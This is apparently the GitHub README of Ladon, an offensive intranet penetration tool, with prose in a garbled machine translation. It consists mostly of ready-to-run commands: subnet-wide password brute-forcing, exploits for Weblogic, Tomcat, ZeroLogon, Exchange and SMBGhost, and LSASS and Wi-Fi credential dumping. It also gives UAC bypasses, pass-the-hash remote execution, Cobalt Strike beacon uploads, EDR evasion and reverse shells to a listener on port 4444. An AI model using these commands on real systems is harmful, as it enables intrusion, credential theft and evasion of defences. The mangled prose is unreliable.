Skip to content
/ Ladon Public

Ladon đại hình nội võng thẩm thấu công cụ, nhưng PowerShell mô khối hóa, nhưng CS cắm kiện hóa, nhưng nội tồn thêm tái, vô văn kiện rà quét. Hàm cảng rà quét, phục vụ phân biệt, internet tài sản dò xét, mật mã thẩm kế, cao nguy lỗ hổng kiểm tra đo lường, lỗ hổng lợi dụng, mật mã đọc lấy cùng với một kiện GetShell, duy trì phê lượng A đoạn /B đoạn /C đoạn cùng với vượt võng đoạn rà quét, duy trì URL, trưởng máy, vực danh danh sách rà quét chờ. Ladon 12.2 nội trí 262 cái công năng, internet tài sản dò xét mô khối 32 cái thông qua nhiều loại hiệp nghị (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) cùng với phương pháp nhanh chóng thu hoạch mục tiêu internet tồn tại trưởng máy IP, máy tính danh, công tác tổ, cùng chung tài nguyên, võng tạp địa chỉ, thao tác hệ thống phiên bản, trang web, tử vực danh, trung gian kiện, mở ra phục vụ, bộ định tuyến, tổng đài điện thoại, cơ sở dữ liệu, máy in chờ tin tức, cao nguy lỗ hổng kiểm tra đo lường 16 cái hàm MS17010, Zimbra, Exchange

License

Notifications You must be signed in to change notification settings

k8gege/Ladon

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Repository files navigation

Ladon 12.2 20231215 Oracle cơ sở dữ liệu một kiện đề quyền

Author Ladon Bin GitHub issues Github Stars GitHub forks GitHub license Downloads

image

Trình tự tóm tắt

Ladon đại hình nội võng thẩm thấu \ vực thẩm thấu \ nằm ngang công cụ, nhưng PowerShell mô khối hóa, nhưng CS cắm kiện hóa, nhưng nội tồn thêm tái, vô văn kiện rà quét. Hàm cảng rà quét, phục vụ phân biệt, internet tài sản dò xét, mật mã thẩm kế, cao nguy lỗ hổng kiểm tra đo lường, lỗ hổng lợi dụng, mật mã đọc lấy cùng với một kiện GetShell, duy trì phê lượng A đoạn /B đoạn /C đoạn cùng với vượt võng đoạn rà quét, duy trì URL, trưởng máy, vực danh danh sách rà quét chờ. 12.2 phiên bản nội trí 262 công năng mô khối, internet tài sản dò xét mô khối 30+ hiệp nghị (ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP) cùng với phương pháp nhanh chóng thu hoạch mục tiêu internet tồn tại trưởng máy IP, máy tính danh, công tác tổ, cùng chung tài nguyên, võng tạp địa chỉ, thao tác hệ thống phiên bản, trang web, tử vực danh, trung gian kiện, mở ra phục vụ, bộ định tuyến, tổng đài điện thoại, cơ sở dữ liệu, máy in chờ tin tức, cao nguy lỗ hổng kiểm tra đo lường 16+ bao hàm Cisco, Zimbra, Exchange, DrayTek, MS17010, SMBGhost, Weblogic, ActiveMQ, Tomcat, Struts2 hệ liệt, Printer chờ, mật mã thẩm kế 25+ hàm cơ sở dữ liệu (Mysql, Oracle, MSSQL), FTP, SSH, VNC, Windows(LDAP, SMB/IPC, NBT, WMI, SmbHash, WmiHash, Winrm), BasicAuth, Tomcat, Weblogic, Rar chờ, viễn trình chấp hành mệnh lệnh bao hàm (smbexec/wmiexe/psexec/atexec/sshexec/webshell),Web vân tay phân biệt mô khối nhưng phân biệt 135+ ( Web ứng dụng, trung gian kiện, kịch bản gốc loại hình, giao diện loại hình ) chờ, bản địa đề quyền 21+ hàm SweetPotato\BadPotato\EfsPotato\BypassUAC, nhưng độ cao tự định nghĩa cắm kiện POC duy trì.NET trình tự tập, DLL(C#/Delphi/VC), PowerShell chờ ngôn ngữ biên soạn cắm kiện, duy trì thông qua phối trí INI phê lượng thuyên chuyển tùy ý phần ngoài trình tự hoặc mệnh lệnh, EXP sinh thành khí nhưng một kiện sinh thành lỗ hổng POC nhanh chóng mở rộng rà quét năng lực. Ladon duy trì Cobalt Strike cắm kiện hóa rà quét nhanh chóng mở rộng nội võng tiến hành nằm ngang di động.

Sử dụng đơn giản

Tuy rằng Ladon công năng phong phú đa dạng, nhưng sử dụng lại phi thường đơn giản, bất luận kẻ nào đều có thể dễ dàng thượng thủ
Chỉ cần một hoặc hai cái tham số liền nhưng dùng 90% công năng, một cái mô khối tương đương với một cái tân công cụ

Vận hành hoàn cảnh

Windows

Ladon nhưng ở trang bị có.net 2.0 cập trở lên phiên bản Win hệ thống trung sử dụng (Win7 sau hệ thống tự mang.net)
Như Cmd, PowerShell, xa khống Cmd, WebShell chờ, cùng với Cobalt Strike nội tồn thêm tái sử dụng
Ladon.ps1 hoàn mỹ kiêm dung Win7-Win11/2022 PowerShell, không xem phiên bản viễn trình thêm tái vô văn kiện thẩm thấu

Toàn ngôi cao LadonGo duy trì Linux, Mac, Arm, MIPS

Toàn ngôi cao: Linux, MacOS, Windows, bộ định tuyến, internet thiết bị chờ OS hệ thống
https://github /k8gege/LadonGo

Kỳ ba điều kiện

Thực chiến cũng không thuận lợi vậy, có chút nội võng chuyển phát sau thực tạp hoặc vô pháp chuyển phát, chỉ có thể đem công cụ thượng truyền đến mục tiêu
Có chút mã khả năng thượng truyền hai ba M trình tự đều phải nửa ngày thậm chí căn bản truyền không được, PY mấy chục M liền càng đừng nghĩ
Ladon chọn dùng C# nghiên cứu phát minh, trình tự thể tích rất nhỏ 500K tả hữu, mặc dù mã không được cũng có thể thượng truyền 500K trình tự đi
Còn không được cũng có thể PowerShell viễn trình nội tồn thêm tái, điểm này là PY hoặc GO biên dịch đại trình tự vô pháp bằng được

Tôn chỉ

Một con rồng phục vụ, vì người dùng cung cấp một cái đơn giản dễ dùng, công năng phong phú, độ cao linh hoạt rà quét công cụ

Đặc sắc

Rà quét lưu lượng tiểu
Trình tự thể tích tiểu
Công năng phong phú cường đại
Trình tự đơn giản dễ dùng
Cắm kiện duy trì nhiều loại ngôn ngữ
Vượt ngôi cao (Win/Kali/Ubuntu) chờ
Duy trì Cobalt Strike cắm kiện hóa
Duy trì PowerShell vô văn kiện thẩm thấu
Exp sinh thành khí nhưng một kiện sinh thành Poc
Nhiều phiên bản áp dụng các loại hoàn cảnh

Trình tự tham số công năng

1 duy trì chỉ định IP rà quét
2 duy trì chỉ định vực danh rà quét
3 duy trì chỉ định máy móc danh rà quét
4 duy trì chỉ định C đoạn rà quét (ip/24)
5 duy trì chỉ định B đoạn rà quét (ip/16)
6 duy trì chỉ định A đoạn rà quét (ip/8)
7 duy trì chỉ định URL rà quét
8 duy trì phê lượng IP rà quét (ip.txt)
9 duy trì phê lượng C đoạn rà quét (ip24.txt)
10 duy trì phê lượng C đoạn rà quét (ipc.txt)
11 duy trì phê lượng B đoạn rà quét (ip16.txt)
12 duy trì phê lượng URL rà quét (url.txt)
13 duy trì phê lượng vực danh rà quét (domain.txt)
14 duy trì phê lượng máy móc danh rà quét (host.txt)
15 duy trì phê lượng quốc gia đoạn rà quét (cidr.txt)
16 duy trì phê lượng tự phù xuyến danh sách (str.txt)
17 duy trì trưởng máy trướng mật danh sách (check.txt)
18 duy trì người dùng mật mã danh sách (userpass.txt)
19 duy trì chỉ định phạm vi C đoạn rà quét
20 duy trì tham số thêm tái tự định nghĩa DLL ( giới hạn C# )
21 duy trì tham số thêm tái tự định nghĩa EXE ( giới hạn C# )
22 duy trì tham số thêm tái tự định nghĩa INI phối trí văn kiện
23 duy trì tham số thêm tái tự định nghĩa PowerShell
24 duy trì tự định nghĩa trình tự ( hệ thống mệnh lệnh hoặc kẻ thứ ba trình tự tức tùy ý ngôn ngữ khai phá trình tự hoặc kịch bản gốc )
25 cắm kiện ( duy trì nhiều loại ngôn ngữ C#/Delphi/Golang/Python/VC/PowerShell)
26 duy trì Cobalt Strike(beacon mệnh lệnh hành hạ rà quét mục tiêu nội võng hoặc ván cầu rà quét ngoại võng mục tiêu )
27 duy trì CIDR cách thức IP rà quét, như 100.64.0.0/10, 192.168.1.1/20 chờ
28 INI phối trí duy trì tự định nghĩa trình tự mật mã bạo phá

Đơn giản rõ ràng sử dụng giáo trình

Ladon đơn giản rõ ràng sử dụng giáo trình hoàn chỉnh hồ sơ:http://k8gege.org/Ladon
Duy trì Cmd, Cobalt Strike, PowerShell chờ nội tồn thêm tái
Windows phiên bản:.Net, Cobalt Strike, PowerShell
Toàn hệ thống phiên bản: GO( toàn ngôi cao ), Python( lý luận thượng toàn ngôi cao )
PS: Study phương tiện bản địa học tập sử dụng, hoàn chỉnh công năng thỉnh sử dụng CMD

BypassEDR rà quét

Cam chịu rà quét tốc độ thực mau, có chút WAF hoặc EDR phòng ngự rất mạnh
Thiết trí mấy tuyến trình đều có khả năng 20 phút tả hữu liền không thể quét
bypassEDR bắt chước nhân công phỏng vấn, vòng qua tốc độ kiểm tra đo lường sách lược

Rà quét tốc độ so chậm, theo đuổi tốc độ lăng đầu thanh không cần sử dụng

Ladon 10.1.2.8/24 MS17010 bypassEDR

Mật mã bạo phá tương quan mô khối tạm không duy trì bypassEDR tham số

001 tự định nghĩa tuyến trình rà quét

Ví dụ: Rà quét mục tiêu 10.1.2 đoạn hay không tồn tại MS17010 lỗ hổng
Đơn tuyến trình:

Ladon 10.1.2.8/24 MS17010 t=1

80 tuyến trình:

Ladon noping 10.1.2.8/24 MS17010 t=80

Cao cường độ phòng hộ hạ rà quét tuyến trình thiết trí thấp một ít, F đơn tuyến trình

Ladon 10.1.2.8/24 MS17010 f=1

002 Socks5 đại lý rà quét

Ví dụ: Sử dụng 8 tuyến trình rà quét mục tiêu 10.1.2 đoạn hay không tồn tại MS17010 lỗ hổng

Ladon noping 10.1.2.8/24 MS17010 t=8<br>

Tường thấy:http://k8gege.org/Ladon/proxy.html

PS: Đại lý công cụ không duy trì Socks5, cho nên cần thiết thêm noping tham số rà quét
Mặc kệ là Frp vẫn là cái khác đồng loại công cụ, chính yếu là Proxifier chờ công cụ không duy trì ICMP hiệp nghị
Bởi vì Ladon cam chịu trước dùng ICMP dò xét tồn tại sau, mới sử dụng đối ứng mô khối thí nghiệm
Cho nên đại lý hoàn cảnh hạ đến cấm ping rà quét, hệ thống ping sử dụng chính là ICMP hiệp nghị

003 võng đoạn rà quét / phê lượng rà quét

CIDR cách thức: Không chỉ là /24/16/8( sở hữu )

Ladon 192.168.1.8/24 rà quét mô khối
Ladon 192.168.1.8/16 rà quét mô khối
Ladon 192.168.1.8/8 rà quét mô khối

Chữ cái cách thức: Chỉ C đoạn B đoạn A đoạn trình tự bài tự

Ladon 192.168.1.8/c rà quét mô khối
Ladon 192.168.1.8/b rà quét mô khối
Ladon 192.168.1.8/a rà quét mô khối

0x004 chỉ định IP phạm vi, võng đoạn rà quét

ICMP dò xét 1 đoạn 50-200 tồn tại trưởng máy

Ladon 192.168.1.50-192.168.1.200 ICMP

ICMP dò xét 1.30 đến 50.80 tồn tại trưởng máy

Ladon 192.168.1.30-192.168.50.80 ICMP

TXT cách thức

004 ICMP phê lượng rà quét C đoạn danh sách tồn tại trưởng máy
Ladon ip24.txt ICMP
Ladon ipc.txt ICMP
005 ICMP phê lượng rà quét B đoạn danh sách tồn tại trưởng máy
Ladon ip16.txt ICMP
006 ICMP phê lượng rà quét cidr danh sách ( như mỗ quốc IP đoạn )
Ladon cidr.txt ICMP
007 ICMP phê lượng rà quét vực danh hay không tồn tại
Ladon domain.txt ICMP
008 ICMP phê lượng rà quét máy móc hay không tồn tại sử dụng trưởng máy danh hoặc máy móc danh dò xét
Ladon host.txt ICMP
009 WhatCMS phê lượng phân biệt CMS, Banner, SSL giấy chứng nhận, tiêu đề, nhưng phân biệt không biết CMS, bộ định tuyến, máy in, internet thiết bị, cameras chờ
Ladon 192.168.1.8 WhatCMS rà quét IP
Ladon 192.168.1.8/24 WhatCMS rà quét C đoạn
Ladon 192.168.1.8/C WhatCMS rà quét C đoạn
Ladon 192.168.1.8/B WhatCMS rà quét B đoạn
Ladon 192.168.1.8/A WhatCMS rà quét A đoạn
Ladon IP.TXT WhatCMS rà quét IP danh sách
Ladon IP24.TXT WhatCMS rà quét C đoạn danh sách
Ladon IP16.TXT WhatCMS rà quét B đoạn danh sách
Ladon cidr.TXT WhatCMS rà quét toàn bộ quốc gia IP đoạn danh sách
Cấm PING rà quét<br>
Ladon noping 192.168.1.8 WhatCMS rà quét IP
Ladon noping 192.168.1.8/24 WhatCMS rà quét C đoạn
010 phê lượng kiểm tra đo lường DrayTek bộ định tuyến phiên bản, lỗ hổng, nhược khẩu lệnh
Ladon url.txt DraytekPoc
011 phê lượng giải mật Base64 mật mã
Ladon str.txt DeBase64

Tài sản rà quét, vân tay phân biệt, phục vụ phân biệt, tồn tại trưởng máy, cảng rà quét

image

012 ICMP rà quét tồn tại trưởng máy ( nhanh nhất )
Ladon 192.168.1.8/24 ICMP
013 Ping dò xét tồn tại trưởng máy ( thuyên chuyển hệ thống Ping mệnh lệnh hồi hiện ms, ttl chờ tin tức )
Ladon 192.168.1.8/24 Ping

Nếu ngươi cho rằng ping mệnh lệnh người tài năng là tồn tại, có thể sử dụng này mệnh lệnh phê lượng

014 nhiều hiệp nghị dò xét tồn tại trưởng máy ( IP, máy móc danh, MAC/ vực danh, chế tạo thương / hệ thống phiên bản )
Ladon 192.168.1.8/24 OnlinePC
015 nhiều hiệp nghị phân biệt thao tác hệ thống ( IP, máy móc danh, thao tác hệ thống phiên bản, mở ra phục vụ )
Ladon 192.168.1.8/24 OsScan
016 OXID dò xét nhiều võng tạp trưởng máy
Ladon 192.168.1.8/24 EthScan
Ladon 192.168.1.8/24 OxidScan
017 DNS dò xét nhiều võng tạp trưởng máy
Ladon 192.168.1.8/24 DnsScan
018 nhiều hiệp nghị rà quét tồn tại trưởng máy IP
Ladon 192.168.1.8/24 OnlineIP
019 rà quét SMB lỗ hổng MS17010 ( IP, máy móc danh, lỗ hổng đánh số, thao tác hệ thống phiên bản )
Ladon 192.168.1.8/24 MS17010
020 SMBGhost lỗ hổng kiểm tra đo lường CVE-2020-0796 ( IP, máy móc danh, lỗ hổng đánh số, thao tác hệ thống phiên bản )
Ladon 192.168.1.8/24 SMBGhost
021 rà quét Web tiêu đề Banner càng toàn tin tức thỉnh sử dụng WhatCMS mô khối dò xét
Ladon 192.168.1.8/24 WebScan
Ladon http://192.168.1.8 WebScan
022 rà quét C đoạn trạm điểm URL vực danh
Ladon 192.168.1.8/24 UrlScan
023 rà quét C đoạn trạm điểm URL vực danh
Ladon 192.168.1.8/24 SameWeb
024 rà quét tử vực danh, nhị cấp vực danh
Ladon baidu SubDomain
025 vực danh phân tích IP, trưởng máy danh phân tích IP
Ladon baidu DomainIP
Ladon baidu HostIP
025 phê lượng vực danh phân tích IP, phê lượng trưởng máy danh phân tích IP
Ladon domain.txt DomainIP
Ladon host.txt HostIP
025 phê lượng vực danh, trưởng máy danh phân tích kết quả chỉ có IP
Ladon domain.txt Domain2IP
Ladon host.txt Host2IP
026 DNS tuần tra vực nội máy móc, IP ( điều kiện vực nội, chỉ định vực khống IP)
Ladon AdiDnsDump 192.168.1.8
027 tuần tra vực nội máy móc, IP ( điều kiện vực nội )

Ladon GetDomainIP

028 rà quét C đoạn cảng, chỉ định cảng rà quét
Ladon 192.168.1.8/24 PortScan
Ladon 192.168.1.8 PortScan 80,445,3389
029 rà quét C đoạn WEB cập phân biệt CMS ( 86+Web vân tay phân biệt )
Ladon 192.168.1.8/24 WhatCMS
030 rà quét tư khoa thiết bị
Ladon 192.168.1.8/24 CiscoInfo
Ladon http://192.168.1.8 CiscoInfo
031 cái cử Mssql cơ sở dữ liệu trưởng máy ( cơ sở dữ liệu IP, máy móc danh, SQL phiên bản )
Ladon EnumMssql
032 cái cử internet cùng chung tài nguyên ( vực, IP, trưởng máy danh \ cùng chung đường nhỏ )
Ladon EnumShare
033 rà quét LDAP server ( dò xét vực khống )
Ladon 192.168.1.8/24 LdapScan
034 rà quét FTP server cũng phân biệt phiên bản
Ladon 192.168.1.8/24 FtpScan

Bạo lực phá giải / internet chứng thực / nhược khẩu lệnh / mật mã bạo phá / cơ sở dữ liệu / trang web hậu trường / đổ bộ khẩu / hệ thống đổ bộ

image Mật mã bạo phá tường giải tham khảo SSH:http://k8gege.org/Ladon/sshscan.html

035 445 cảng SMB mật mã bạo phá (Windows)
Ladon 192.168.1.8/24 SmbScan
036 135 cảng Wmi mật mã bạo phá (Windowns)
Ladon 192.168.1.8/24 WmiScan
037 389 cảng LDAP server, AD vực mật mã bạo phá (Windows)
Ladon 192.168.1.8/24 LdapScan
038 5985 cảng Winrm mật mã bạo phá (Windowns)
Ladon 192.168.1.8/24 WinrmScan
039 445 cảng SMB NTLM HASH bạo phá (Windows)
Ladon 192.168.1.8/24 SmbHashScan
040 135 cảng Wmi NTLM HASH bạo phá (Windows)
Ladon 192.168.1.8/24 WmiHashScan
041 22 cảng SSH mật mã bạo phá (Linux)
Ladon 192.168.1.8/24 SshScan
Ladon 192.168.1.8:22 SshScan
042 1433 cảng Mssql cơ sở dữ liệu mật mã bạo phá
Ladon 192.168.1.8/24 MssqlScan
043 1521 cảng Oracle cơ sở dữ liệu mật mã bạo phá
Ladon 192.168.1.8/24 OracleScan

Oracle cơ sở dữ liệu tương đối đặc thù, chỉ bạo ORCL kho sẽ bỏ lỡ rất nhiều quyền hạn
Tường thấy:http://k8gege.org/Ladon/OracleScan.html

044 3306 cảng Mysql cơ sở dữ liệu mật mã bạo phá
Ladon 192.168.1.8/24 MysqlScan
045 7001 cảng Weblogic hậu trường mật mã bạo phá
Ladon http://192.168.1.8:7001/console WeblogicScan<br>
Ladon 192.168.1.8/24 WeblogicScan
046 5900 cảng VNC viễn trình mặt bàn mật mã bạo phá
Ladon 192.168.1.8/24 VncScan
047 21 cảng Ftp server mật mã bạo phá
Ladon 192.168.1.8/24 FtpScan
048 8080 cảng Tomcat hậu trường đổ bộ mật mã bạo phá
Ladon 192.168.1.8/24 TomcatScan
Ladon http://192.168.1.8:8080/manage TomcatScan
049 Web cảng 401 cơ sở chứng thực mật mã bạo phá
Ladon http://192.168.1.8/login HttpBasicScan
Ladon ip.txt 401Scan
050 445 cảng Impacket SMB mật mã bạo phá (Windowns)
Ladon 192.168.1.8/24 SmbScan.ini
051 445 cảng IPC mật mã bạo phá (Windowns)
Ladon 192.168.1.8/24 IpcScan.ini
052 139 cảng Netbios hiệp nghị Windows mật mã bạo phá
Ladon 192.168.1.8/24 NbtScan
053 5985 cảng Winrm hiệp nghị Windows mật mã bạo phá
Ladon 192.168.1.8/24 WinrmScan
054 internet cameras mật mã bạo phá ( nội trí cam chịu mật mã )
Ladon 192.168.1.8/24 DvrScan

Lỗ hổng kiểm tra đo lường /Poc

image

055 SMB lỗ hổng kiểm tra đo lường (CVE-2017-0143/CVE-2017-0144)
Ladon 192.168.1.8/24 MS17010
056 SMBGhost lỗ hổng kiểm tra đo lường CVE-2020-0796 911 giữ lại
Ladon 192.168.1.8/24 SMBGhost
057 Weblogic lỗ hổng kiểm tra đo lường (CVE-2019-2725/CVE-2018-2894)
Ladon 192.168.1.8/24 WeblogicPoc
058 PhpStudy cửa sau kiểm tra đo lường (phpstudy 2016/phpstudy 2018) 10.9 di trừ 911 giữ lại
Ladon 192.168.1.8/24 PhpStudyPoc
059 ActiveMQ lỗ hổng kiểm tra đo lường (CVE-2016-3088)
Ladon 192.168.1.8/24 ActivemqPoc
060 Tomcat lỗ hổng kiểm tra đo lường (CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatPoc
061 Struts2 lỗ hổng kiểm tra đo lường (S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode)
Ladon 192.168.1.8/24 Struts2Poc
062 DraytekPoc CVE-2020-8515 lỗ hổng kiểm tra đo lường, Draytek phiên bản dò xét, nhược khẩu lệnh kiểm tra đo lường
Ladon 192.168.1.8 DraytekPoc
Ladon 192.168.1.8/24 DraytekPoc

Lỗ hổng lợi dụng /Exploit

image

063 Weblogic lỗ hổng lợi dụng (CVE-2019-2725)
Ladon 192.168.1.8/24 WeblogicExp
064 Tomcat lỗ hổng lợi dụng (CVE-2017-12615)
Ladon 192.168.1.8/24 TomcatExp
065 Windows 0day lỗ hổng thông dụng DLL rót vào chấp hành CMD sinh thành khí (DLL chỉ 5KB)
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=<br>
Ladon CmdDll b64x64 YwBhAGwAYwA=
066 CVE-2021-40444 hơi mềm IE/Office 0day lỗ hổng
Ladon CVE-2021-40444 MakeCab poc.dll<br>
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8
067 DraytekExp CVE-2020-8515 viễn trình chấp hành mệnh lệnh EXP
Ladon DraytekExp http://192.168.1.8 whoami
068 vực thẩm thấu ZeroLogon CVE-2020-1472 vực khống đề quyền ( mật mã trí không )
Ladon ZeroLogon dc.k8gege.org
069 CVE-2020-0688 Exchange danh sách hóa lỗ hổng (.net 4.0)
Ladon cve-2020-0688 192.168.1.142 Administrator K8gege520
070 ForExec tuần hoàn lỗ hổng lợi dụng (Win10 vĩnh hằng chi hắc CVE-2020-0796, thành công rời khỏi để tránh mục tiêu lam bình )
Ladon ForExec"CVE-2020-0796-Exp -i 192.168.1.8 -p 445 -e --load-shellcode test.txt"80"Exploit finnished"

Văn kiện download, văn kiện truyền

071 nội võng văn kiện truyền HTTP download HTTPS download MSF download
Ladon wget https://downloads.metasploit /data/releases/metasploit-latest-windows-x64-installer.exe<br>
Ladon HttpDownLoad http://k8gege.org/Download/Ladon.rar
072 nội võng văn kiện truyền Ftp download
Ladon FtpDownLoad 127.0.0.1:21 admin admin test.exe

Mã hóa giải mật (HEX/Base64)

073 Hex mã hóa giải mật
Ladon 123456 EnHex
Ladon 313233343536 DeHex
074 Base64 mã hóa giải mật
Ladon 123456 EnBase64
Ladon MTIzNDU2 DeBase64
Ladon str.txt DeBase64

Internet tìm tòi

075 Ftp mật mã tìm tòi ( trói định bổn cơ IP, tự động tìm tòi C đoạn )
Ladon FtpSniffer 192.168.1.5
076 HTTP mật mã tìm tòi ( trói định bổn cơ IP, tự động tìm tòi C đoạn )
Ladon HTTPSniffer 192.168.1.5
077 internet tìm tòi
Ladon Sniffer

Mật mã đọc lấy

078 đọc lấy IIS trạm điểm mật mã, trang web đường nhỏ
Ladon IISpwd
079 đọc lấy liên tiếp quá WIFI mật mã
Ladon WifiPwd
080 đọc lấy FileZilla FTP mật mã
Ladon FileZillaPwd
081 đọc lấy hệ thống Hash, VPN mật mã, DPAPI-Key 10.9 di trừ
Ladon CVE-2021-36934
082 DumpLsass nội tồn mật mã (mimikatz văn bản rõ ràng ) hạn 9.1.1 phiên bản phía trước
Ladon DumpLsass

Tin tức thu thập

image

083 thu hoạch bổn cơ nội võng IP cùng ngoại võng IP
Ladon GetIP
084 thu hoạch PCname GUID CPUID DiskID Mac địa chỉ
Ladon GetID
085 xem xét người dùng gần nhất phỏng vấn văn kiện
Ladon Recent
086 USB, USB sử dụng ký lục xem xét (USB tên, USB đánh dấu, đường nhỏ tin tức )
Ladon UsbLog
087 kiểm tra đo lường cửa sau ( đăng ký biểu khởi động hạng, DLL bắt cóc )
Ladon CheckDoor
Ladon AutoRun
088 tiến trình kỹ càng tỉ mỉ tin tức ( trình tự đường nhỏ, vị số, khởi động tham số, người dùng )
Ladon EnumProcess
Ladon Tasklist
089 thu hoạch mệnh lệnh hành tham số
Ladon cmdline
Ladon cmdline cmd.exe
090 thu hoạch thẩm thấu cơ sở tin tức
Ladon GetInfo
Ladon GetInfo2
091.NET & PowerShell phiên bản
Ladon NetVer
Ladon PSver
Ladon NetVersion
Ladon PSversion
092 vận hành khi phiên bản & biên dịch hoàn cảnh
Ladon Ver<br>
Ladon Version
093 vận hành khi phiên bản & biên dịch hoàn cảnh & trang bị phần mềm danh sách
Ladon AllVer
Ladon AllVersion
094 xem xét IE đại lý tin tức
Ladon QueryProxy
095 DirList liệt mục lục + cơ sở thẩm thấu tin tức
Cam chịu liệt toàn bộ
Ladon DirList
Chỉ định bàn phù hoặc mục lục
Ladon DirList c:\
096 QueryAdmin xem xét quản lý viên người dùng
Ladon QueryAdmin
097 xem xét bổn cơ mệnh danh ống dẫn
Ladon GetPipe
098 RdpLog xem xét 3389 liên tiếp ký lục
Ladon RdpLog

Viễn trình chấp hành (psexec/wmiexec/atexec/sshexec/smbexec)

image

099 445 cảng mã hóa PSEXEC viễn trình chấp hành mệnh lệnh ( lẫn nhau thức )
net use\\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec>whoami
nt authority\system
100 135 cảng WmiExec viễn trình chấp hành mệnh lệnh ( phi lẫn nhau thức )
Ladon wmiexec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon wmiexec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
101 445 cảng AtExec viễn trình chấp hành mệnh lệnh ( phi lẫn nhau thức )
Ladon AtExec 192.168.1.8 k8gege k8gege520 whoami
102 22 cảng SshExec viễn trình chấp hành mệnh lệnh ( phi lẫn nhau thức )
Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami
103 JspShell viễn trình chấp hành mệnh lệnh ( phi lẫn nhau thức ) 9.3.0 di trừ

Usage: Ladon JspShell type url pwd cmd

Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami
104 WebShell viễn trình chấp hành mệnh lệnh ( phi lẫn nhau thức ) 9.3.0 di trừ
Usage: Ladon WebShell ScriptType ShellType urlpwdcmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspxcdhttp://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami
Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon whoami
Thu hoạch hệ thống phiên bản tin tức phương tiện đề quyền
Example: Ladon WebShell jsp 5 http://192.168.1.8/123.jsp Ladon OSinfo
105 135 cảng WmiExec2 viễn trình chấp hành mệnh lệnh duy trì HASH ( phi lẫn nhau thức ) duy trì văn kiện thượng truyền
Ladon WmiExec2 host user pass cmd whoami
Ladon WmiExec2 pth host cmd whoami trước Mimikatz rót vào Hash, lại pth chấp hành mệnh lệnh
Base64CmdforCobalt Strike
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Ladon WmiExec2 host user pass b64cmd dwBoAG8AYQBtAGkA
Upload:
Ladon WmiExec2 host user pass upload beacon.exe ceacon.exe
Ladon WmiExec2 pth host upload beacon.exe ceacon.exe trước Mimikatz rót vào Hash, lại pth chấp hành mệnh lệnh
106 445 cảng SmbExec Ntlm-Hash phi lẫn nhau thức viễn trình chấp hành mệnh lệnh ( vô hồi hiện )
Ladon SmbExec 192.168.1.8 k8gege k8gege520 cmd whoami
Ladon SmbExec 192.168.1.8 k8gege k8gege520 b64cmd d2hvYW1p
107 WinrmExec viễn trình chấp hành mệnh lệnh vô hồi hiện ( duy trì System quyền hạn )
Ladon WinrmExec 192.168.1.8 5985 k8gege.org Administrator K8gege520 calc.exe

Đề quyền hàng quyền

image

108 whoami xem xét trước mặt người dùng quyền hạn cùng với đặc quyền
Ladon whoami
109 6 loại bạch danh sách BypassUAC(8.0 sau )Win7-Win10 10.8 phiên bản di trừ chỉ 911 giữ lại

Cách dùng: Ladon BypassUAC Method Base64Cmd

Ladon BypassUAC eventvwr Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC fodhelper Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC computerdefaults Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC sdclt Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC slui Y21kIC9jIHN0YXJ0IGNhbGMuZXhl
Ladon BypassUAC dikcleanup Y21kIC9jIHN0YXJ0IGNhbGMuZXhlICYmIFJFTQ==
110 BypassUac2 vòng qua UAC chấp hành, duy trì Win7-Win10 10.8 phiên bản di trừ chỉ 911 giữ lại
Ladon BypassUac2 c:\1.exe
Ladon BypassUac2 c:\1.bat
111 PrintNightmare (CVE-2021-1675 | CVE-2021-34527) máy in lỗ hổng đề quyền EXP
Ladon PrintNightmare c:\evil.dll
Ladon CVE-2021-1675 c:\evil.dll
112 CVE-2022-21999 SpoolFool máy in lỗ hổng đề quyền EXP
Ladon SpoolFool poc.dll
Ladon CVE-2022-21999 poc.dll
113 GetSystem đề quyền System quyền hạn chấp hành CMD
Ladon GetSystem cmd.exe
114 phục chế lệnh bài chấp hành CMD( như system quyền hạn hàng quyền exploer trước mặt người dùng )
Ladon GetSystem cmd.exe explorer
115 Runas bắt chước người dùng chấp hành mệnh lệnh
Ladon Runas user pass cmd
116 MS16135 đề quyền đến SYSTEM
Ladon ms16135 whoami>=9.2.1 phiên bản di trừ 911 giữ lại
117 BadPotato phục vụ người dùng đề quyền đến SYSTEM
Ladon BadPotato cmdline
118 SweetPotato phục vụ người dùng đề quyền đến SYSTEM
Ladon SweetPotato cmdline
119 EfsPotato Win7-2019 đề quyền ( phục vụ người dùng quyền hạn nhắc tới system)
Ladon EfsPotato whoami
120 Open3389 một kiện mở ra 3389
Ladon Open3389
121 kích hoạt nội trí quản lý viên Administrator
Ladon ActiveAdmin
122 kích hoạt nội trí người dùng Guest
Ladon ActiveGuest

Bắn ngược Shell

123 bắn ngược TCP NC Shell
Ladon ReverseTcp 192.168.1.8 4444 nc
124 bắn ngược TCP MSF Shell
Ladon ReverseTcp 192.168.1.8 4444 shell
125 bắn ngược TCP MSF MET Shell
Ladon ReverseTcp 192.168.1.8 4444 meter
126 bắn ngược HTTP MSF MET Shell
Ladon ReverseHttp 192.168.1.8 4444
127 bắn ngược HTTPS MSF MET Shell
Ladon ReverseHttps 192.168.1.8 4444
